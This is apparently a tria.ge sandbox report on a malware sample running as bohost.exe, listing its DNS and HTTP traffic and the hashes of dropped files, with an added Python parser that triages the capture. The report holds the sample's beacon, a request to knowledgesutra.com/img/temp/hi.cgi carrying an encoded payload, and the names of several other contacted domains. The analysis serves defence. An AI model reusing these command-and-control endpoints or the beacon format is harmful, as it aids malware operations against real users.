                                                                                      X-Content-Type-Options: nosniff
                                                                                      Cache-Control: public, max-age=253
                                                                                      Date: Sun, 19 Jan 2025 14:41:57 GMT
                                                                                      Connection: keep-alive
                                                                                      Server-Timing: cdn-cache; desc=HIT
                                                                                      Server-Timing: edge; dur=1
                                                                                      Akamai-GRN: 0.ce3e1202.1737297717.425063d0
                                                                                      Server-Timing: ak_p; desc="1737297717060_34750158_1112564688_16_857_48_0_-";dur=1
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
                                                                                      Remote address:
                                                                                      104.78.173.45:80
                                                                                      Request
                                                                                      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Accept: */*
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: evcs-ocsp.ws.symantec.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Content-Type: application/ocsp-response
                                                                                      Content-Length: 5
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Cache-Control: public, max-age=253
                                                                                      Date: Sun, 19 Jan 2025 14:41:57 GMT
                                                                                      Connection: keep-alive
                                                                                      Server-Timing: cdn-cache; desc=HIT
                                                                                      Server-Timing: edge; dur=1
                                                                                      Akamai-GRN: 0.ce3e1202.1737297717.425063d3
                                                                                      Server-Timing: ak_p; desc="1737297717114_34750158_1112564691_11_1171_48_0_-";dur=1
                                                                                    • flag-us
                                                                                      DNS
                                                                                      evcs-crl.ws.symantec.com
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      evcs-crl.ws.symantec.com
                                                                                      IN A
                                                                                      Response
                                                                                      evcs-crl.ws.symantec.com
                                                                                      IN CNAME
                                                                                      crl-symcprod.digicert.com
                                                                                      crl-symcprod.digicert.com
                                                                                      IN CNAME
                                                                                      mpki-crl.edge.digicert.com
                                                                                      mpki-crl.edge.digicert.com
                                                                                      IN CNAME
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      pki-ocsp.digicert.com.edgekey.net
                                                                                      IN CNAME
                                                                                      e3782.cd.akamaiedge.net
                                                                                      e3782.cd.akamaiedge.net
                                                                                      IN A
                                                                                      104.78.173.45
                                                                                    • flag-gb
                                                                                      GET
                                                                                      http://evcs-crl.ws.symantec.com/evcs.crl
                                                                                      Remote address:
                                                                                      104.78.173.45:80
                                                                                      Request
                                                                                      GET /evcs.crl HTTP/1.1
                                                                                      Cache-Control: max-age = 3600
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      If-Modified-Since: Mon, 07 Oct 2024 08:46:45 GMT
                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                      Host: evcs-crl.ws.symantec.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Content-Type: application/pkix-crl
                                                                                      Content-Length: 1824
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Cache-Control: public, max-age=921
                                                                                      Date: Sun, 19 Jan 2025 14:41:57 GMT
                                                                                      Connection: keep-alive
                                                                                      Server-Timing: cdn-cache; desc=HIT
                                                                                      Server-Timing: edge; dur=1
                                                                                      Akamai-GRN: 0.da3e1202.1737297717.1e24ddf1
                                                                                      Server-Timing: ak_p; desc="1737297717272_34750170_505732593_12_867_48_0_-";dur=1
                                                                                    • flag-us
                                                                                      DNS
                                                                                      7.98.51.23.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      7.98.51.23.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      7.98.51.23.in-addr.arpa
                                                                                      IN PTR
                                                                                      a23-51-98-7deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      45.173.78.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      45.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      45.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      a104-78-173-45deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      knowledgesutra.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      knowledgesutra.com
                                                                                      IN A
                                                                                      Response
                                                                                      knowledgesutra.com
                                                                                      IN A
                                                                                      3.33.130.190
                                                                                      knowledgesutra.com
                                                                                      IN A
                                                                                      15.197.148.33
                                                                                    • flag-us
                                                                                      GET
                                                                                      http://knowledgesutra.com/img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      3.33.130.190:80
                                                                                      Request
                                                                                      GET /img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq HTTP/1.0
                                                                                      Connection: close
                                                                                      Host: knowledgesutra.com
                                                                                      Accept: */*
                                                                                      User-Agent: chrome/9.0
                                                                                      Response
                                                                                      HTTP/1.0 200 OK
                                                                                      content-type: text/html
                                                                                      date: Sun, 19 Jan 2025 14:41:58 GMT
                                                                                      content-length: 387
                                                                                    • flag-us
                                                                                      DNS
                                                                                      190.130.33.3.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      190.130.33.3.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      190.130.33.3.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2aa9ff50de748dbeawsglobalacceleratorcom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      154.239.44.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      154.239.44.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      webhomefordomains.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      webhomefordomains.com
                                                                                      IN A
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      56.163.245.4.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      56.163.245.4.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      15.164.165.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      15.164.165.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      ourthreedomains.com
                                                                                      bohost.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      ourthreedomains.com
                                                                                      IN A
                                                                                      Response
• (US) DNS 166.190.18.2.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request:  166.190.18.2.in-addr.arpa IN PTR
    Response: 166.190.18.2.in-addr.arpa IN PTR a2-18-190-166.deploy.static.akamaitechnologies.com
• (US) DNS seeworldonlines.com  [bohost.exe]
    Remote address: 8.8.8.8:53
    Request:  seeworldonlines.com IN A
    Response: (no answer)
• (US) DNS 8.153.16.2.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request:  8.153.16.2.in-addr.arpa IN PTR
    Response: 8.153.16.2.in-addr.arpa IN PTR a2-16-153-8.deploy.static.akamaitechnologies.com
• (US) DNS www.google.com  [bohost.exe]
    Remote address: 8.8.8.8:53
    Request:  www.google.com IN A
    Response: www.google.com IN A 142.250.187.196
• (GB) GET http://www.google.com/  [bohost.exe]
    Remote address: 142.250.187.196:80
    Request:
      GET / HTTP/1.0
      Connection: close
      Host: www.google.com
      Accept: */*
    Response:
      HTTP/1.0 302 Found
      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPKetLwGIjA2WjlgNJW1mtJsKIkDCxl4NE0LrT3VuBhE8kSdHQjEarFpS88lSNA4UkptdE0wTo0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
      x-hallmonitor-challenge: CgwI8p60vAYQvOHa_wISBLXXsFM
      Content-Type: text/html; charset=UTF-8
      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-q6HCG90AWRpE1bvjwcA-KQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
      Date: Sun, 19 Jan 2025 14:42:58 GMT
      Server: gws
      Content-Length: 396
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Set-Cookie: AEC=AZ6Zc-XyUpj_dvAH0RTVDCoET4uLw9oMdAvCAm80jdd3kdCK00qdiial_w; expires=Fri, 18-Jul-2025 14:42:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
• (US) DNS 196.187.250.142.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request:  196.187.250.142.in-addr.arpa IN PTR
    Response: 196.187.250.142.in-addr.arpa IN PTR lhr25s33-in-f4.1e100.net
• (GB) GET http://www.google.com/  [bohost.exe]
    Remote address: 142.250.187.196:80
    Request:
      GET / HTTP/1.1
      Connection: close
      Pragma: no-cache
      Host: www.google.com
    Response:
      HTTP/1.1 302 Found
      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
      x-hallmonitor-challenge: CgwI8560vAYQ98uKhQESBLXXsFM
      Content-Type: text/html; charset=UTF-8
      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-KndAstvJzPzcv59_l5FtMw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
      Date: Sun, 19 Jan 2025 14:42:59 GMT
      Server: gws
      Content-Length: 396
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Set-Cookie: AEC=AZ6Zc-Xw0m-1n8eUk_K7FVHRxURyPhtiwjgvRxqa17AGpcaaPxB6J0CRyAk; expires=Fri, 18-Jul-2025 14:42:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
      Connection: close
• (GB) GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM  [bohost.exe]
    Remote address: 142.250.187.196:80
    Request:
      GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
      Connection: close
      Pragma: no-cache
      Host: www.google.com
    Response:
      HTTP/1.1 429 Too Many Requests
      Date: Sun, 19 Jan 2025 14:42:59 GMT
      Pragma: no-cache
      Expires: Fri, 01 Jan 1990 00:00:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Content-Type: text/html
      Server: HTTP server (unknown)
      Content-Length: 3086
      X-XSS-Protection: 0
      Connection: close
• (US) DNS 21.236.111.52.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request:  21.236.111.52.in-addr.arpa IN PTR
    Response: (no answer)
• (US) DNS 199.111.78.13.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request:  199.111.78.13.in-addr.arpa IN PTR
    Response: (no answer)
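The per-request detail above and the connection summary that follows are tria.ge output. The parser below is an added example, not tria.ge code; it reads the detail listing in the shape it has on this page (one bullet per entry, then flag icon, kind, target, optional process, remote address, request lines, response lines) and turns it into records. Its SAMPLE is constructed from entries shown above, de-indented and with Google's long q= strings shortened, plus the knowledgesutra.com request rebuilt from the connection summary (its request line is assumed, the pr= value is shortened). The triage helper encodes the two readings an analyst needs from this capture: a DNS query that comes back empty (seeworldonlines.com, issued by bohost.exe) points at dead or sinkholed infrastructure, and the 302 to /sorry/ followed by a 429 from www.google.com is Google's abuse detection throttling the sandbox's egress address, which shows only that bohost.exe has connectivity. What is left, the sample-attributed GET to knowledgesutra.com hi.cgi?pr=... that returned 200, is the request worth pulling apart.

```python
# Added example (not tria.ge code): parse the flattened network listing above into records
# and triage them. SAMPLE is constructed from entries on this page, de-indented and with long
# query strings shortened; the knowledgesutra.com entry is rebuilt from the connection summary.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """\
• flag-us
DNS
seeworldonlines.com
bohost.exe
Remote address:
8.8.8.8:53
Request
seeworldonlines.com
IN A
Response
• flag-gb
GET
http://www.google.com/
bohost.exe
Remote address:
142.250.187.196:80
Request
GET / HTTP/1.0
Response
HTTP/1.0 302 Found
Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS
• flag-gb
GET
http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS
bohost.exe
Remote address:
142.250.187.196:80
Request
GET /sorry/index?continue=http://www.google.com/&q=EgS HTTP/1.1
Response
HTTP/1.1 429 Too Many Requests
• flag-us
GET
http://knowledgesutra.com/img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7uk
bohost.exe
Remote address:
3.33.130.190:80
Request
GET /img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7uk HTTP/1.1
Response
HTTP/1.1 200 OK
"""

@dataclass
class NetEvent:
    kind: str                  # "DNS" or an HTTP method such as "GET"
    target: str                # queried name or requested URL
    process: Optional[str]     # originating process, when the sandbox attributed one
    remote: str                # ip:port the traffic went to
    request: List[str] = field(default_factory=list)
    response: List[str] = field(default_factory=list)

    def status(self) -> Optional[int]:
        """HTTP status code from the response status line; None for DNS or no response."""
        m = re.match(r"HTTP/\d\.\d (\d{3})", self.response[0]) if self.response else None
        return int(m.group(1)) if m else None

    def answers(self) -> List[str]:
        """DNS rdata: the listing repeats (name, 'IN <type>', value) triples in the response."""
        return self.response[2::3] if self.kind == "DNS" else []

def parse_listing(text: str) -> List[NetEvent]:
    """Split on the bullet that starts each entry; the layout inside an entry is positional."""
    events = []
    for chunk in re.split(r"^•", text, flags=re.M)[1:]:
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        # lines[0] is flag-icon residue, lines[1] the kind, lines[2] the target; an optional
        # process line sits between the target and "Remote address:".
        rem = lines.index("Remote address:")
        process = lines[3] if rem == 4 else None
        req, resp = lines.index("Request", rem), lines.index("Response", rem)
        events.append(NetEvent(lines[1], lines[2], process, lines[rem + 1],
                               lines[req + 1:resp], lines[resp + 1:]))
    return events

def triage(events: List[NetEvent]) -> Dict[str, List[str]]:
    """Separate dead infrastructure and sandbox-side noise from real sample contacts."""
    out: Dict[str, List[str]] = {"unresolved": [], "rate_limited": [], "contacts": []}
    for ev in events:
        who = ev.process or "unattributed"
        if ev.kind == "DNS":
            if not ev.answers():  # nothing came back: dead or sinkholed candidate
                out["unresolved"].append(f"{who} -> {ev.target}")
        elif ev.status() == 429 or any(ln.lower().startswith("location:") and "/sorry/" in ln
                                       for ln in ev.response):
            # Google's /sorry page: abuse detection throttling the sandbox egress IP, not C2
            out["rate_limited"].append(f"{who} -> {ev.target}")
        elif ev.process:
            out["contacts"].append(f"{who} -> {ev.remote} {ev.target} ({ev.status()})")
    return out
```

Run `triage(parse_listing(SAMPLE))` and the only entry left in `contacts` is the bohost.exe request to knowledgesutra.com; everything else in the capture is either a failed lookup or Google's rate limiter. Background traffic without a process (the Symantec OCSP/CRL fetches and the reverse lookups in the summary below) falls through every branch and is ignored, which is the intended behaviour: it is the sandbox OS, not the sample.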
• 104.78.173.45:80  http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
    http, sent 843 B / recv 1.2kB, pkts 7 / 6
    HTTP Request:  GET http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
    HTTP Response: 200
    HTTP Request:  GET http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D
    HTTP Response: 200
• 104.78.173.45:80  http://evcs-crl.ws.symantec.com/evcs.crl
    http, sent 490 B / recv 2.5kB, pkts 6 / 6
    HTTP Request:  GET http://evcs-crl.ws.symantec.com/evcs.crl
    HTTP Response: 200
• 3.33.130.190:80  http://knowledgesutra.com/img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq
    http, bohost.exe, sent 664 B / recv 741 B, pkts 6 / 6
    HTTP Request:  GET http://knowledgesutra.com/img/temp/hi.cgi?pr=gwY92w4AuRBWbrRO2QAo0wOz7ukAgS681%2B49DjbaU0bA1bLC5rAxBX1t7hu6pVcXk2BLg5UAxxnUOLHuW7kOQ2yo3iOz2Kl9wXSBD8G7Owt7whO5Tnzoq2LN2ZMSPbcWhHyI1U50yZ1djHoL6W3mVAJEBuwA8vLMAwqI8p0TlUGgtjdNSy2xb7z0fJBkGv4FT5DojjA%2FvJpvYf1nki5wDOTGYSIn0BsplKCQvqlgZgnwsh3A3OIMWjvi0xNwPOvh7Lyqqmrfq
    HTTP Response: 200
• 127.0.0.1:58323
• 127.0.0.1:58323  [explorer.exe]
• 142.250.187.196:80  http://www.google.com/
    http, bohost.exe, sent 302 B / recv 1.5kB, pkts 5 / 5
    HTTP Request:  GET http://www.google.com/
    HTTP Response: 302
• 142.250.187.196:80  http://www.google.com/
    http, bohost.exe, sent 307 B / recv 1.5kB, pkts 5 / 5
    HTTP Request:  GET http://www.google.com/
    HTTP Response: 302
• 142.250.187.196:80  http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    http, bohost.exe, sent 526 B / recv 3.7kB, pkts 6 / 7
    HTTP Request:  GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGPOetLwGIjCPxnaCY61ZwEyrtDo1XgD0oqqkmtLPqDLxXxTLg0QdKSnqete51DbKZ3yqUrVy1BMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    HTTP Response: 429
• 127.0.0.1:58323
• 127.0.0.1:58323
• 127.0.0.1:58323  [bohost.exe]
• 127.0.0.1:58323  [bohost.exe]
• 8.8.8.8:53  104.219.191.52.in-addr.arpa
    dns, sent 73 B / recv 147 B, pkts 1 / 1
    DNS Request:  104.219.191.52.in-addr.arpa
• 8.8.8.8:53  71.31.126.40.in-addr.arpa
    dns, sent 71 B / recv 157 B, pkts 1 / 1
    DNS Request:  71.31.126.40.in-addr.arpa
• 8.8.8.8:53  167.173.78.104.in-addr.arpa
    dns, sent 73 B / recv 139 B, pkts 1 / 1
    DNS Request:  167.173.78.104.in-addr.arpa
• 8.8.8.8:53  228.249.119.40.in-addr.arpa
    dns, sent 73 B / recv 159 B, pkts 1 / 1
    DNS Request:  228.249.119.40.in-addr.arpa
• 8.8.8.8:53  evcs-ocsp.ws.symantec.com
    dns, sent 71 B / recv 230 B, pkts 1 / 1
    DNS Request:  evcs-ocsp.ws.symantec.com
    DNS Response: 104.78.173.45
• 8.8.8.8:53  evcs-crl.ws.symantec.com
    dns, sent 70 B / recv 231 B, pkts 1 / 1
    DNS Request:  evcs-crl.ws.symantec.com
    DNS Response: 104.78.173.45
• 8.8.8.8:53  7.98.51.23.in-addr.arpa
    dns, sent 69 B / recv 131 B, pkts 1 / 1
    DNS Request:  7.98.51.23.in-addr.arpa
• 8.8.8.8:53  45.173.78.104.in-addr.arpa
    dns, sent 72 B / recv 137 B, pkts 1 / 1
    DNS Request:  45.173.78.104.in-addr.arpa
• 8.8.8.8:53  knowledgesutra.com
    dns, bohost.exe, sent 64 B / recv 96 B, pkts 1 / 1
    DNS Request:  knowledgesutra.com
    DNS Response: 3.33.130.190, 15.197.148.33
• 8.8.8.8:53  190.130.33.3.in-addr.arpa
    dns, sent 71 B / recv 127 B, pkts 1 / 1
    DNS Request:  190.130.33.3.in-addr.arpa
• 224.0.0.251:5353
    112 B, 2 pkts
                                                                                    • 8.8.8.8:53
                                                                                      154.239.44.20.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      158 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      154.239.44.20.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      webhomefordomains.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      67 B
                                                                                      140 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      webhomefordomains.com

                                                                                    • 8.8.8.8:53
                                                                                      56.163.245.4.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      157 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      56.163.245.4.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      15.164.165.52.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      146 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      15.164.165.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      ourthreedomains.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      65 B
                                                                                      138 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      ourthreedomains.com

                                                                                    • 8.8.8.8:53
                                                                                      166.190.18.2.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      135 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      166.190.18.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      seeworldonlines.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      65 B
                                                                                      138 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      seeworldonlines.com

                                                                                    • 8.8.8.8:53
                                                                                      8.153.16.2.in-addr.arpa
                                                                                      dns
                                                                                      69 B
                                                                                      131 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      8.153.16.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      www.google.com
                                                                                      dns
                                                                                      bohost.exe
                                                                                      60 B
                                                                                      76 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      www.google.com

                                                                                      DNS Response

                                                                                      142.250.187.196

                                                                                    • 8.8.8.8:53
                                                                                      196.187.250.142.in-addr.arpa
                                                                                      dns
                                                                                      74 B
                                                                                      112 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      196.187.250.142.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      21.236.111.52.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      158 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      21.236.111.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      199.111.78.13.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      146 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      199.111.78.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
  Filesize: 471B
  MD5:    959d2a9c777132fe5498a165d5bbaaf7
  SHA1:   5cd8dd5a857fd362647a22ec0732207888f29bb9
  SHA256: 8bf88caa748bd496eb1290b073a40bc4d595a64ee5be59bd001826c5ec9befba
  SHA512: 66b2f65cb3ca7bf905aea846fc34ed6b818174438f4277114784162ed0b2e8bd18b54f195847ee765889750e8ddb903615367d71dbe0a12cc28cf1f07bcca923

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
  Filesize: 412B
  MD5:    331df4ccaa91f3bffdd4c68fe9e778e3
  SHA1:   2a19e0fe77eecc2b145a02f74e7bf22c0ef9be6f
  SHA256: 0aa0fcd49aba096669030e35de6a68a26d4b9d6d7d7a9ec0ddb27d4c7319be04
  SHA512: 8f6cd60a4bcc013ffc48a3ee82aac23a349583ad2af144ecbff6567155b8ef25f6a39391d1bc3c28bcd9503d81881ac9be8500c6486dc5e841ee54dce386a5a3

• C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
  Filesize: 2KB
  MD5:    012167e68953af83d0ea4ff5d880407b
  SHA1:   21d0cd0efa1999f1a4e6c21164c82c0e63c1c222
  SHA256: 82719c941f03070e4814ccde6ecc086b04348de2c3bd13f7f894d7b8f6175fb8
  SHA512: b05247b762dc0316ae32fdc3313fea2cd6bbdf1f8edc971cf38e1df6bd1c84b325eb15347ede39dc9449fb98ea0c2e34c359a84d20d3a24cd3a4b59a0c495cb6

• C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\80AM9X7C\microsoft.windows[1].xml
  Filesize: 96B
  MD5:    c839a1973d3feaead377ea2dad131fe6
  SHA1:   252758616792b9b2f10bc460c84b1c1eba75ea04
  SHA256: efecd8d483398a6cb569af17e66cb0ba1ca4b9c65f4a697fc7642cc007fc3ccd
  SHA512: fee6ca3d2ae272b0f1f291e98830215f2ac138747651be78325ab7c1ba3f01f72cbfed4c886853caba45f16c59c78543a87a5f872b2c1f85bffa3a4e11bf50e1

• C:\Users\Admin\AppData\Roaming\D0769\9E3C.076
  Filesize: 996B
  MD5:    f441a17da8efa194910ec308d167485f
  SHA1:   779a7bec12c38b0076d3f317b9fca397f631d05b
  SHA256: c76296420e21572f3a6f0a355691281377e7c6803a8d56482c361868cf56f4a6
  SHA512: ecd591e7e9f22991ec26151d4d0fc1c0913c1657d11c6873e882531e70c565957d3c3d3a0958949719464af8d7bbf51910e3d1f7face47a6999a00659cc714d0

• C:\Users\Admin\AppData\Roaming\D0769\9E3C.076
  Filesize: 1KB
  MD5:    be587b97650c34510843f3e4a22c4848
  SHA1:   60600227a0a1e4e6a0b482fe73f46db6ec14e846
  SHA256: d065008ed40b69f1a449c5b3c5ed5149f39a70fef9053bcd663deeff38c79259
  SHA512: 7d590f102e241d1bc80ce44af5217521b4e334579722f310a0a42228c138ff4aae379e5e6015584409a1a23b223d2cebdc92fe1132e7d372a89598a732a517b5

• C:\Users\Admin\AppData\Roaming\D0769\9E3C.076
  Filesize: 600B
  MD5:    8a215f82a1aa0deaa061f6e76fdeec64
  SHA1:   7468308724f4ababafcc1bb59abacad689d0b471
